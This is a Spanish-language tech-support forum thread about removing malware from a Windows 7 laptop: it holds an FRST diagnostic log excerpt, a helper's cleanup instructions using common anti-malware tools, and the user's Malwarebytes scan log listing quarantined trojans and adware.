Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (03/26/2020 06:42:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xfd8
Hora de inicio de la aplicación con errores: 0x01d603d07e823f47
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: c92a40aa-6fc3-11ea-9672-00262d6f27b2

Error: (03/26/2020 06:41:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Nombre del módulo con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x00004fa9
Id. del proceso con errores: 0x47c
Hora de inicio de la aplicación con errores: 0x01d603d04ff92c2d
Ruta de acceso de la aplicación con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Ruta de acceso del módulo con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Id. del informe: c123b114-6fc3-11ea-9672-00262d6f27b2

Error: (03/26/2020 06:40:49 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/26/2020 06:19:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xcc0
Hora de inicio de la aplicación con errores: 0x01d603cd4612a2d3
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 91250054-6fc0-11ea-a561-00262d6f27b2

Error: (03/26/2020 06:18:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\MARCO AVILA\AppData\Local\chromium\Application\chrome.exe".
No se encontró el ensamblado dependiente 58.0.2988.0,language="&#x2a;",type="win32",version="58.0.2988.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (03/26/2020 06:05:06 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {3a3ec622-de8a-4bb6-8b23-165573a7ea91}

Error: (03/26/2020 05:55:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: nlsvc.exe, versión: 3.0.0.11, marca de tiempo: 0x4d876c73
Nombre del módulo con errores: ntdll.dll, versión: 6.1.7601.23539, marca de tiempo: 0x57c99b8f
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0000000000048d84
Id. del proceso con errores: 0xf5c
Hora de inicio de la aplicación con errores: 0x01d603c9f87faba0
Ruta de acceso de la aplicación con errores: C:\Program Files\NetLimiter 3\nlsvc.exe
Ruta de acceso del módulo con errores: C:\Windows\SYSTEM32\ntdll.dll
Id. del informe: 44bc83c0-6fbd-11ea-b27e-00262d6f27b2

Error: (03/26/2020 05:55:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Nombre del módulo con errores: errorResponder.exe, versión: 0.0.0.0, marca de tiempo: 0x5e69de61
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x00004fa9
Id. del proceso con errores: 0x75c
Hora de inicio de la aplicación con errores: 0x01d603c9cd7e275c
Ruta de acceso de la aplicación con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Ruta de acceso del módulo con errores: C:\ProgramData\ErrorResponder\errorResponder.exe
Id. del informe: 4148379e-6fbd-11ea-b27e-00262d6f27b2


Errores del sistema:
=============
Error: (03/26/2020 06:44:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:03 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:44:03 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mvd21 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:03 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:44:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:44:02 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.

Error: (03/26/2020 06:43:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: El servicio mdf15 no pudo iniciarse debido al siguiente error: 
Se ha bloqueado la descarga de este controlador

Error: (03/26/2020 06:43:58 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Se bloqueó la carga de \??\C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys por una incompatibilidad con este sistema. Póngase en contacto con el fabricante del software para obtener una versión compatible del controlador.


Windows Defender:
===================================
Date: 2015-03-24 06:23:24.821
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{C4B00BA7-6BCC-412D-890A-A12E0BF6C8FF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2015-03-03 06:00:49.092
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{A4A05D0B-9AFA-4E8F-9B47-13063FE90563}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:NT AUTHORITY\Servicio de red

Date: 2012-04-10 21:48:48.719
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:Win32/Agent.gen!A&threatid=135442
Nombre:Backdoor:Win32/Agent.gen!A
Id.:135442
Gravedad:Grave
Categoría:Puerta trasera
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe;file:C:\Users\MARCO AVILA\AppData\Local\Temp\Rar$EX00.881\SUPER 2008\SuperSetup.exe->(ZipSfx)->server.exe
Tipo de detección:Genérico
Origen de detección:Sistema
Estado:Desconocido
Usuario:NT AUTHORITY\SYSTEM
Nombre de proceso:

Date: 2010-07-04 23:15:31.293
Description: 
Windows Defender detectó spyware u otro software potencialmente no deseado.
Para obtener más información, consulte lo siguiente:
http://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Adload.BK&threatid=150859
Nombre:TrojanDownloader:Win32/Adload.BK
Id.:150859
Gravedad:Alta
Categoría:Descargador troyano
Ruta de acceso encontrada:containerfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;file:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar->DAEMON Tools Pro Advanced 4.36.0309.0160\DAEMONToolsPro4360309-0160.exe->(nsis-1-$(ENVVAR)\restorepoint.exe);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{DAC796B3-EDCF-460E-8CCA-6B1011B99C04}-DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar;webfile:C:\Users\MARCO AVILA\Desktop\DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar|http://rs835tl3.rapidshare.com/files/403186699/1620412/DAEMON_Tools_Pro_Advanced_4.36.0309.0160_Full.rar
Tipo de detección:Concreto
Origen de detección:Descargas y datos adjuntos
Estado:Desconocido
Usuario:MARCOAVILA-PC\MARCO AVILA
Nombre de proceso:C:\Program Files (x86)\Internet Explorer\iexplore.exe

CodeIntegrity:
===================================

Date: 2020-03-26 18:44:37.986
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Windows\System32\drivers\Winmon.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:37.712
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Windows\System32\drivers\Winmon.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.745
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.470
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:03.181
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.921
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.364
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

Date: 2020-03-26 18:44:02.109
Description: 
Windows no puede comprobar la integridad de imagen del archivo \Device\HarddiskVolume3\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys porque el hash del archivo no se encuentra en el sistema. Puede que un cambio reciente de hardware o software haya instalado un archivo dañado o con una firma incorrecta, o que exista un software malintencionado de origen desconocido.

==================== Información de la memoria =========================== 

BIOS: INSYDE V1.30 09/29/2009
Placa base: Acer Aspire 4810T
Procesador: Genuine Intel(R) CPU U4100 @ 1.30GHz
Porcentaje de memoria en uso: 83%
RAM física total: 3003.79 MB
RAM física disponible: 487.01 MB
Virtual total: 7117.49 MB
Virtual disponible: 1015.31 MB

==================== Unidades ================================

Drive c: (ACER) (Fixed) (Total:453.94 GB) (Free:97.98 GB) NTFS

\\?\Volume{5e7a9bc6-de7f-11de-9b61-806e6f6e6963}\ (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5e7a9bc5-de7f-11de-9b61-806e6f6e6963}\ (PQSERVICE) (Fixed) (Total:11.72 GB) (Free:1.48 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BC3BBC3B)
Partition 1: (Not Active) - (Size=11.7 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453.9 GB) - (Type=07 NTFS)

==================== Final de Addition.txt =======================

JavierHF · 27 Marzo, 2020 15:11

Hola.

Sigo viendo en el informe de Addition.txt el programa “CloudNet” SI lo buscas desde el panel de programas instalados de Windows o desde RevoUninstaller a ti NO te aparece…??

Marco · 27 Marzo, 2020 20:07

Hola!

CloudNet si me sigue apareciendo en ambos, cuando lo desinstalo con Revo desaparece pero vuelve a aparecer después de un tiempo.

Quiero comentarte que desinstalé Malwarebytes y lo volví a instalar y ya lo pude correr, aún no he hecho ningún análisis a menos que tu me lo indiques.

Saludos.

JavierHF · 27 Marzo, 2020 21:24

Hola.

Entendido, entonces ahora sigue estos pasos, en el orden indicado y leyendo todo lo explicado.

Desactiva temporalmente el Antivirus Cómo deshabilitar temporalmente su Antivirus, mientras estemos realizando TODOS los pasos.

Vamos a descargar en TU ESCRITORIO(y NO en otro lugar ) todas las herramientas que vamos a utilizar en este procedimiento (pero no las ejecutes todavía) :

CCleaner + Manual.
Malwarebytes’ Anti-Malware + Manual. revisa en detalle el manual, para que sepas usarlo y configurarlo correctamente.
AdwCleaner + Manual.
Junkware Removal Tool.
Farbar Recovery Scan Tool. seleccionando la versión adecuada para la arquitectura(32 o 64bits) de tu equipo. Como saber si Mi Windows es de 32 o 64 Bits ?.

Ejecutas las herramientas de una en una y en el orden indicado :

CCleaner.-

Instalas y Ejecutas CCleaner siguiendo los pasos indicados en el manual.
Úsalo primero en su opción de Limpiador para borrar cookies, temporales de Internet y todos los archivos que te muestre como obsoletos.
Después usa su opción de Registro para limpiar todo el registro de Windows(haciendo copia de seguridad).

Malwarebytes.-

Instalas y Ejecutas MBAM siguiendo los pasos indicados en el manual.
Realiza un Análisis Personalizado.
Seleccionando TODOS a Cuarentena para enviarlo a la cuarentena y Reinicias el sistema.
En el apartado del programa Historial de detecciones encontrarás el informe de MBAM, que debes copiar y pegar en tu próxima respuesta, para poder analizarlo.

AdwCleaner.-

Ejecuta Adwcleaner.exe.
Pulsamos en el botón Analizar ahora, y espera a que se realice el proceso, inmediatamente pulsa siempre sobre el botón Iniciar Reparación.
Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
El log/informe lo encontramos en la pestaña “Informes”, volviendo a abrir el programa si fuese necesario, para poder copiarlo y pegarlo en tu próxima respuesta.
El informe también se puede encontrar en C:\AdwCleaner\Logs\AdwCleaner[C00].txt

Junkware Removal Tool.-

Ejecuta JRT.exe.
Y pulsar cualquier tecla para continuar, esperar pacientemente a que termine el proceso.
Si en algún momento te pide Reiniciar hazlo.
Al finalizar, un registro/informe (JRT.txt) se guardara en el escritorio y se abrirá automáticamente.
Copia y pega el contenido de JRT.txt en tu próxima respuesta.

Farbar Recovery Scan Tool.-

Ejecuta FRST.exe.
En el mensaje de la ventana del Disclaimer/Responsabilidad, pulsamos Sí/Yes
En la ventana principal pulsamos en el botón Analizar/Scan y esperamos a que concluya el proceso.
Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Poner los informes en tu próxima respuesta de :

Malwarebytes, AdwCleaner, JRT, FRST + Addition.txt, y en ese orden.

Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(más de 64.000 caracteres aprox.).

Y nos cuentas como funciona tu equipo en relación al problema planteado.

Saludos.

Marco · 28 Marzo, 2020 02:33

Hola!

Te comento que he realizado lo que me indicaste en tu ultimo mensaje y al parecer todo ha regresado a la normalidad, han desaparecido las ventanas emergentes y la PC ya no esta lenta, ademas de que al iniciar el ordenador lo hace como antes. A continuación te envío los reportes que me solicitaste.

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 27/3/20
Hora del análisis: 18:12
Archivo de registro: d8b3238e-7088-11ea-a1d1-00262d6f27b2.json

-Información del software-
Versión: 4.1.0.56
Versión de los componentes: 1.0.859
Versión del paquete de actualización: 1.0.21478
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: MAAH-PC\MARCO AVILA

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 422545
Amenazas detectadas: 212
Amenazas en cuarentena: 212
Tiempo transcurrido: 40 min, 31 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 8
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, En cuarentena, 922, 259506, , , , 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En cuarentena, 491, 455564, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, En cuarentena, 424, 379533, , , , 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En cuarentena, 491, 196479, , , , 
Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, En cuarentena, 3712, 667274, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, En cuarentena, 1138, 781246, , , , 
RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, En cuarentena, 7487, 804571, , , , 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], En cuarentena, 0, 392686, , , , 

Módulo: 9
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, En cuarentena, 922, 259506, , , , 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, En cuarentena, 491, 455564, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, En cuarentena, 424, 379533, , , , 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, En cuarentena, 491, 196479, , , , 
Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, En cuarentena, 3712, 667274, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, En cuarentena, 1138, 781246, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86\SQLite.Interop.dll, En cuarentena, 424, 431817, , , , 
RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, En cuarentena, 7487, 804571, , , , 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], En cuarentena, 0, 392686, , , , 

Clave del registro: 96
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CloudPrinter, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Se eliminará al reiniciar, 922, 259987, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Se eliminará al reiniciar, 266, 259314, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\TESTAPP, Se eliminará al reiniciar, 494, 781336, 1.0.21478, , ame, 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System\SYSTEMCHECK, Se eliminará al reiniciar, 3119, 414093, , , , 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}, Se eliminará al reiniciar, 3119, 414093, , , , 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}, Se eliminará al reiniciar, 3119, 414093, , , , 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASAPI32, Se eliminará al reiniciar, 922, 259705, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASMANCS, Se eliminará al reiniciar, 922, 259705, 1.0.21478, , ame, 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Snorler_RASAPI32, Se eliminará al reiniciar, 904, 655949, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefender, Se eliminará al reiniciar, 491, 455564, , , , 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Snorler_RASMANCS, Se eliminará al reiniciar, 904, 655949, 1.0.21478, , ame, 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Snorler.exe, Se eliminará al reiniciar, 904, 655948, 1.0.21478, , ame, 
Adware.Linkury, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\BACKLH, Se eliminará al reiniciar, 424, 379533, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\csrss, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{968BD611-9D62-4C37-B71A-BA21308BDE53}, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{968BD611-9D62-4C37-B71A-BA21308BDE53}, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0f872661-c863-47a4-863f-c065c182858a}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{9D613F8A-B30E-4938-8490-CB5677701EBF}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{A195846E-1536-4ACD-A720-9DB32D3AD239}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{5E376961-9097-481C-886C-59A7A3DE24F0}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{6766BB3A-7821-46B3-98BF-41F0402B73D1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{72C88F85-FE66-4E49-BA23-8E850D607D06}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{76EECC6C-1042-4272-9468-9DF02AFB0A2D}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0776ae27-5ab9-4e18-9063-1836da63117a}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0E24F81B-3B09-4455-95CE-0B8C719EA2DC}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
